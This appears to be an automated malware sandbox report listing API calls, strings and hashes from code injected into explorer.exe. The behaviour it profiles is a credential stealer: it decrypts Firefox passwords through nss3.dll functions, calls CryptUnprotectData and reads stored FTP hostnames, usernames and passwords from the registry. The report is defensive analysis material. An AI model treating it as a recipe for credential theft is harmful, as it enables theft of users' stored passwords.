• Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
Similarity
• API ID: memcmp$memcpy
• String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
• API String ID: 231171946-1096842476
• Opcode ID: 5b39194a6059062389dfe4f3971c62a60fcb5dc0fe9e39a1775a488108d42e9e
• Instruction ID: 29f3ac3e9e04b92c74a88bf790062dd01bc6b2620d89986f6f2ea901bbfaf6e7
• Opcode Fuzzy Hash: 5b39194a6059062389dfe4f3971c62a60fcb5dc0fe9e39a1775a488108d42e9e
• Instruction Fuzzy Hash: EEC10470A093858BEB34CE18849677AB7D1FBDA318F04252EE4D5C7252D728FC458BC6
APIs
  • Part of subcall function 007E6AAA: memset.NTDLL ref: 007E6AC5
• memset.NTDLL ref: 00805F53
Strings
Memory Dump Source
• Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
Similarity
• API ID: memset
• String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
• API String ID: 2221118986-594550510
• Opcode ID: 9cece84b7179eb6f5aea2e91cf1d2dfdb7d5e01e736d06dc6c9f4040b5b4f60d
• Instruction ID: 018dadc4c48fc454b07175cbdf6e47508778fe180ac0bc3e8fdc75edb1c39358
• Opcode Fuzzy Hash: 9cece84b7179eb6f5aea2e91cf1d2dfdb7d5e01e736d06dc6c9f4040b5b4f60d
• Instruction Fuzzy Hash: 59C18B706047029FCB54DF25C884A2AB7E2FFC8714F04892DF854D7282EB35E962CB92
APIs
  • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
  • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
• GetSystemTimeAsFileTime.KERNEL32(?), ref: 007E2127
• _alldiv.NTDLL(?,?,00989680,00000000), ref: 007E213A
• wsprintfA.USER32 ref: 007E214F
Strings
Memory Dump Source
• Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
Similarity
• API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
• String ID: %li
• API String ID: 4120667308-1021419598
• Opcode ID: e96278266daf0900c486078ba856fbae172e1aad9f1f51f2776d27413caa5d22
• Instruction ID: 2d43ab2a28f55ba26abbaeb888984a2201d8833efb1ca79d3e1e4da2d1b2ac06
• Opcode Fuzzy Hash: e96278266daf0900c486078ba856fbae172e1aad9f1f51f2776d27413caa5d22
• Instruction Fuzzy Hash: D7E0D83264120877C7213BBC9C0BEEF7B6CEB80B15F004591F900E2182E5764B7483D5
APIs
• lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,007E3E4B,00000000), ref: 007E124A
• CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 007E1268
  • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
  • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
• CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 007E1295
Memory Dump Source
• Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
Similarity
• API ID: BinaryCryptHeapString$AllocateProcesslstrlen
• String ID:
• API String ID: 117552131-0
• Opcode ID: 147afb7946011c17f25a69eb9a07bae338b143939c5a68353ad0cf6888cbd2b5
• Instruction ID: f5380d32a6c0e246ebd1bcbaa6f7a0de37c129388d9724cb100742a143392c6f
• Opcode Fuzzy Hash: 147afb7946011c17f25a69eb9a07bae338b143939c5a68353ad0cf6888cbd2b5
• Instruction Fuzzy Hash: CD014F71214345BFE718CF5ADC8AEBBB7ACFB85655F004A2EF50186250EBA29C058670
APIs
• lstrlenW.KERNEL32(?,7556F360,00000000,?,00000000,?,007E46E3), ref: 007E11ED
• CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 007E120F
  • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
  • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
• CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 007E1231
Memory Dump Source
• Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
Similarity
• API ID: BinaryCryptHeapString$AllocateProcesslstrlen
• String ID:
• API String ID: 117552131-0
• Opcode ID: b6ee58036414408076280a7c28f5ccf8b063fcdb354021b41b39676eec5cad1d
• Instruction ID: 99511aacf92aa2da95162d609c5532e51c87a77368a2f2cd457641b1202e248b
• Opcode Fuzzy Hash: b6ee58036414408076280a7c28f5ccf8b063fcdb354021b41b39676eec5cad1d
• Instruction Fuzzy Hash: 32F0967230530E7BE2149E56DC82FA77B9DEF85794F15042EB701D2141EEA2ED0542B4
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007E1FFA
• RtlMoveMemory.NTDLL(?,?,?), ref: 007E2015
Memory Dump Source
• Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
Similarity
• API ID: CryptDataMemoryMoveUnprotect
• String ID:
• API String ID: 2807545630-0
• Opcode ID: 61fd61b9dc7db88915075d929da1ef35db82467f67e53dde33df0cad9a76b244
• Instruction ID: f3d908e7153af50487433017defd8651f93e2a11a1676b0d3d7974ed87d0fd84
• Opcode Fuzzy Hash: 61fd61b9dc7db88915075d929da1ef35db82467f67e53dde33df0cad9a76b244
• Instruction Fuzzy Hash: 6F017172A01219AB9B14CF9ADC84DAFBBBCEF48350B10046AF905D3241D7749E11CBA0
APIs
• CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 007E11B2
  • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
  • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
• CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?,?,?,00000001,00000000,?), ref: 007E11D2
Memory Dump Source
• Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
Similarity
• API ID: BinaryCryptHeapString$AllocateProcess
• String ID:
• API String ID: 3825993179-0
• Opcode ID: 852028a7c0da561761bfc0e08e5d43b77a6b02d59ba7bf142102d4c366beffff
• Instruction ID: aa1e1501741d3d7657127e4298d95e7eedfe64c123f6a25cf267333b4e0d0225
• Opcode Fuzzy Hash: 852028a7c0da561761bfc0e08e5d43b77a6b02d59ba7bf142102d4c366beffff
• Instruction Fuzzy Hash: 1EF0A732601158B7D724C69BDC8ADEBFB6DDFC97A1B500169F909D3140EA729D4483A0
APIs
  • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
  • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
  • Part of subcall function 007E1090: lstrlenW.KERNEL32(?,?,00000000,007E17E5), ref: 007E1097
  • Part of subcall function 007E1090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 007E10A8
  • Part of subcall function 007E19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,007E2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 007E19C4
• GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 007E2503
• SetCurrentDirectoryW.KERNEL32(00000000), ref: 007E250A
• LoadLibraryW.KERNEL32(00000000), ref: 007E2563
• SetCurrentDirectoryW.KERNEL32(?), ref: 007E2570
• GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 007E2591
• GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 007E259E
• GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 007E25AB
• GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 007E25B8
• GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 007E25C5
• GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 007E25D2
• GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 007E25DF
  • Part of subcall function 007E190B: lstrlen.KERNEL32(?,?,?,?,00000000,007E2783), ref: 007E192B
  • Part of subcall function 007E190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,007E2783), ref: 007E1930
  • Part of subcall function 007E190B: lstrcat.KERNEL32(00000000,?), ref: 007E1946
  • Part of subcall function 007E190B: lstrcat.KERNEL32(00000000,00000000), ref: 007E194A
Strings
Memory Dump Source
• Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
Similarity
• API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
• String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
• API String ID: 3366569387-3272982511
• Opcode ID: 5994b67c4bb16fd0ff6285614d1036cdff2e3d7d189a7dec0d17d1e7bf059b0b
• Instruction ID: 69087654ee12d91062c6cd66c37576f10c55a6d3e0d8ae25f222347ef06e8c68
• Opcode Fuzzy Hash: 5994b67c4bb16fd0ff6285614d1036cdff2e3d7d189a7dec0d17d1e7bf059b0b
• Instruction Fuzzy Hash: 66410935A023C19BCB14AB7A9C5942E3AD9FBCA740740452EE451D3252EF7C8C47CB91
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E5BF5: memset.NTDLL ref: 007E5C07
                                                                                                                                      • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 007E60E1
                                                                                                                                      • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 007E60EC
                                                                                                                                      • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 007E6113
                                                                                                                                      • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 007E618E
                                                                                                                                      • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 007E61B5
                                                                                                                                      • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 007E61C1
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _alldiv$_allrem$memset
                                                                                                                                      • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                                                                                      • API String ID: 2557048445-1989508764
                                                                                                                                      • Opcode ID: 01fba919cff4cdf9135b2372f3a36e083889a0b285ce9c810a5b7435869570db
                                                                                                                                      • Instruction ID: 92f771832efec0dc7e8de24064b04a5e714189bc56dfe7771c5765ee950dc7fe
                                                                                                                                      • Opcode Fuzzy Hash: 01fba919cff4cdf9135b2372f3a36e083889a0b285ce9c810a5b7435869570db
                                                                                                                                      • Instruction Fuzzy Hash: 4DB1B1B29097C69BD7359E2ACC84B3A7FD8FB9C388F140559F582D61D1E62CCD1086D1
                                                                                                                                      APIs
                                                                                                                                      • memcmp.NTDLL(0083637A,BINARY,00000007), ref: 007FD324
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: memcmp
                                                                                                                                      • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                                                                                      • API String ID: 1475443563-3683840195
                                                                                                                                      • Opcode ID: e19ef8ccb7c3447fb1cd085b29340f80fd869660cda27f0c2f86f29ebd97fc18
                                                                                                                                      • Instruction ID: 997c4361bbb85e7d4da26b14d47a5fef362d5279bafb81973c08fc00af045556
                                                                                                                                      • Opcode Fuzzy Hash: e19ef8ccb7c3447fb1cd085b29340f80fd869660cda27f0c2f86f29ebd97fc18
                                                                                                                                      • Instruction Fuzzy Hash: 7E51BE32608348EBC7219F548845A7A73A6FF89300F144869FBA19B341E779ED09D792
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E19E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1A1E
                                                                                                                                        • Part of subcall function 007E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 007E1A3C
                                                                                                                                        • Part of subcall function 007E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 007E1A75
                                                                                                                                        • Part of subcall function 007E19E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1A98
                                                                                                                                        • Part of subcall function 007E482C: lstrlenW.KERNEL32(?), ref: 007E4845
                                                                                                                                        • Part of subcall function 007E482C: lstrlenW.KERNEL32(?), ref: 007E488F
                                                                                                                                        • Part of subcall function 007E482C: lstrlenW.KERNEL32(?), ref: 007E4897
                                                                                                                                      • wsprintfW.USER32 ref: 007E49A7
                                                                                                                                      • wsprintfW.USER32 ref: 007E49B9
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                                                                                                      • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                                                                                                      • API String ID: 2889301010-4273187114
                                                                                                                                      • Opcode ID: e5fc4fdaced438d3b4139c03990c102b95854d55dc5f37009a2f6419c24d36cc
                                                                                                                                      • Instruction ID: 444d84c3cdd52159be9741f0bae0309a7bcfbb9f4fe6d74512019a1a371aecc5
                                                                                                                                      • Opcode Fuzzy Hash: e5fc4fdaced438d3b4139c03990c102b95854d55dc5f37009a2f6419c24d36cc
                                                                                                                                      • Instruction Fuzzy Hash: E331E435706384ABC710AB6BC84682FB6DDEFCD744B05891DB045E7242EABAEC0187E5
                                                                                                                                      APIs
                                                                                                                                      • memcpy.NTDLL(?,?,?,?,00000000), ref: 007EFB32
                                                                                                                                      • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 007EFB4D
                                                                                                                                      • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 007EFB60
                                                                                                                                      • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 007EFB95
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: memcpy
                                                                                                                                      • String ID: -journal$-wal$immutable$nolock
                                                                                                                                      • API String ID: 3510742995-3408036318
                                                                                                                                      • Opcode ID: 98728550c89753ac395afef021a9c34ec634a756ee3941399acfe4e2a6910216
                                                                                                                                      • Instruction ID: 355065e310008be8e0584e6176dec85a6c3d741a78a9a1f61764850076ba9622
                                                                                                                                      • Opcode Fuzzy Hash: 98728550c89753ac395afef021a9c34ec634a756ee3941399acfe4e2a6910216
                                                                                                                                      • Instruction Fuzzy Hash: 1CD1D4B1609381CFC714DF29C88571ABBE1AF99310F18857DF8998B392DB78D805CB62
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: %$-x0$NaN
                                                                                                                                      • API String ID: 0-62881354
                                                                                                                                      • Opcode ID: b56df1c0504a1ce600498c7daf8ea18ebeacd28318b0284e2b011944eeb955a8
                                                                                                                                      • Instruction ID: 090e819cee118e8213211a0f263b36f18ffef508ca52d1299fac8cfa3ad96042
                                                                                                                                      • Opcode Fuzzy Hash: b56df1c0504a1ce600498c7daf8ea18ebeacd28318b0284e2b011944eeb955a8
                                                                                                                                      • Instruction Fuzzy Hash: 04D1037060E3C28BD7298A2A849472ABBE5AFDD344F28485DF9C1C7352D678CD45D782
                                                                                                                                      APIs
                                                                                                                                      • GetHGlobalFromStream.COMBASE(?,?), ref: 007E18A7
                                                                                                                                      • GlobalLock.KERNEL32(WK~), ref: 007E18B6
                                                                                                                                      • GlobalUnlock.KERNEL32(?), ref: 007E18F4
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 007E18E8
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
                                                                                                                                      • String ID: WK~$WK~
                                                                                                                                      • API String ID: 1688112647-3136317167
                                                                                                                                      • Opcode ID: 0b9a2ef2bd4dc8bf45cae261a5273972cf16e4b19d1cf98feff1e2559e4e3f1f
                                                                                                                                      • Instruction ID: 30368e1003ef5acc53c3f0655f8ff32e5b2ca70b9297db18462690bb168d2ca6
                                                                                                                                      • Opcode Fuzzy Hash: 0b9a2ef2bd4dc8bf45cae261a5273972cf16e4b19d1cf98feff1e2559e4e3f1f
                                                                                                                                      • Instruction Fuzzy Hash: C4016275205385AF8B015F2A9C5985F7BAAFFC8761B40C82AF555C3211EF35D9249A20
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: -x0$NaN
                                                                                                                                      • API String ID: 0-3447725786
                                                                                                                                      • Opcode ID: e620c25e2e8607f619fc3bd50cf56782f530357a537910681891793f75e00133
                                                                                                                                      • Instruction ID: baf3aeafa1adf3f044f3581af6bc2d924f7373f57396bb196a1b350c7b27034e
                                                                                                                                      • Opcode Fuzzy Hash: e620c25e2e8607f619fc3bd50cf56782f530357a537910681891793f75e00133
                                                                                                                                      • Instruction Fuzzy Hash: 79E11430A0E3C28BD7298A2A849472ABBE5AFDD344F28495DF9C1C7352D67CCD45D782
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: -x0$NaN
                                                                                                                                      • API String ID: 0-3447725786
                                                                                                                                      • Opcode ID: cb66f691b7754d90f6e40320a872d3de88e0b8d984a67443520a61e75e41d07d
                                                                                                                                      • Instruction ID: f50b85d1cf54b9350ad9975dfe6b379f3db3a756d7cf933da1ccdad315f7fe06
                                                                                                                                      • Opcode Fuzzy Hash: cb66f691b7754d90f6e40320a872d3de88e0b8d984a67443520a61e75e41d07d
                                                                                                                                      • Instruction Fuzzy Hash: CEE1113060E3C28BD729CE2A849472ABBE5AFDD344F28485DF8C187352D678CD45D792
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: -x0$NaN
                                                                                                                                      • API String ID: 0-3447725786
                                                                                                                                      • Opcode ID: a4d44f3a2211d5393d3fb948c6aae46b4e8545dbdf58e54aa8b5e065525fc6d3
                                                                                                                                      • Instruction ID: 47aa82a55dcb78658a987c9698852fde75b8985f0c58de86b64dc70218f72c79
                                                                                                                                      • Opcode Fuzzy Hash: a4d44f3a2211d5393d3fb948c6aae46b4e8545dbdf58e54aa8b5e065525fc6d3
                                                                                                                                      • Instruction Fuzzy Hash: 05E1127060E3C28BD7298E2A849472ABBE5BFDD344F28495DF8C1C7252D678CD45D782
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: memcpymemset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1297977491-0
                                                                                                                                      • Opcode ID: 9e564ccca55cadbcdacd0cb8da6833c3161f8b69d56422100ac22a4c48d1573d
                                                                                                                                      • Instruction ID: 4f153643aacd9a1135710fad3892c4a400ad626963b6eca281d6ded76bc11160
                                                                                                                                      • Opcode Fuzzy Hash: 9e564ccca55cadbcdacd0cb8da6833c3161f8b69d56422100ac22a4c48d1573d
                                                                                                                                      • Instruction Fuzzy Hash: 9A818FB160C3589FC354DF29C884A2BBBE5FF88704F14496DF98587352D678E904CB92
                                                                                                                                      APIs
                                                                                                                                      • lstrlen.KERNEL32(?,?,?,?,00000000,007E2783), ref: 007E192B
                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,?,00000000,007E2783), ref: 007E1930
                                                                                                                                      • lstrcat.KERNEL32(00000000,?), ref: 007E1946
                                                                                                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 007E194A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrcatlstrlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1475610065-0
                                                                                                                                      • Opcode ID: d4484e5a8eeb592be4722d14b9a021fcf58c1c7c817322a9b768ab42c0bbeeb8
                                                                                                                                      • Instruction ID: ea501f0c1c4889e75573466b7d39d11582aea53d749e5fdd467f846fcfdd7028
                                                                                                                                      • Opcode Fuzzy Hash: d4484e5a8eeb592be4722d14b9a021fcf58c1c7c817322a9b768ab42c0bbeeb8
                                                                                                                                      • Instruction Fuzzy Hash: 80E022A230029C2B072073BF6C94D3B77DCDAC92A530A0035FA04C3302FEAAAC0186F0

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:20.5%
                                                                                                                                      Dynamic/Decrypted Code Coverage:86.8%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:182
                                                                                                                                      Total number of Limit Nodes:17
                                                                                                                                      execution_graph: rendered as an image in the original report; the raw node/edge listing is omitted here. Entry functions in the graph: a3a1e0, a337f4, a3a1f9, a3a298, a33608, a33668, a3a1af. Windows APIs reached from the graph: RegCreateKeyExW, RegCloseKey, CreateStreamOnHGlobal, RtlFreeHeap, LoadLibraryA, VirtualProtect, StrStrIW, RegOpenKeyExW, RegEnumKeyExW, RegQueryValueExW, GetFileAttributesW, GetPrivateProfileSectionNamesW, GetPrivateProfileStringW, GetPrivateProfileIntW, FindFirstFileW, FindNextFileW, FindClose, CreateFileW, CloseHandle.

                                                                                                                                      Callgraph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      • Opacity -> Relevance
                                                                                                                                      • Disassembly available
                                                                                                                                      callgraph: rendered as an image in the original report; the raw node/edge listing is omitted here. Nodes are numbered 0 to 106 and cover functions Function_00A31000 through Function_00A3B12C; the most heavily shared callees are Function_00A31838, Function_00A31860 and Function_00A32688.

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph for a330a8-a33252: rendered as an image in the original report; basic-block listing omitted. Calls: a32688, a3272c, FindFirstFileW, a31860, a32700, a32af8, FindNextFileW, FindClose, a32f7c, and a330a8 itself (recursive directory walk).
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000008.00000002.2346984734.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_8_2_a31000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3541575487-0
                                                                                                                                      • Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                                                      • Instruction ID: b637c322c0f29dcf1c66838bd3bf8c3c583857a13df2699fca97f2409c636856
                                                                                                                                      • Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                                                      • Instruction Fuzzy Hash: 76417C31718B4C4FDF94EB3899997AA73E2FBD8341F444A29B44AC3291EF78D9048781

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph for a338b0-a3391a: rendered as an image in the original report; basic-block listing omitted. Calls: a31ad4, a31838, NtUnmapViewOfSection, a3388c, and a338b0 itself (recursive).
                                                                                                                                      APIs
                                                                                                                                      • NtUnmapViewOfSection.NTDLL ref: 00A338F2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000008.00000002.2346984734.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_8_2_a31000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: SectionUnmapView
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 498011366-0
                                                                                                                                      • Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                                                      • Instruction ID: dee7b2687b6a88867a3a2ebb8588bb82c1bb39259e395311f38142e973467164
                                                                                                                                      • Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                                                      • Instruction Fuzzy Hash: E9F0E520F19A080BEF6C77BD695D33822C0EB58311F500929B515C72D2DC3D8E458301

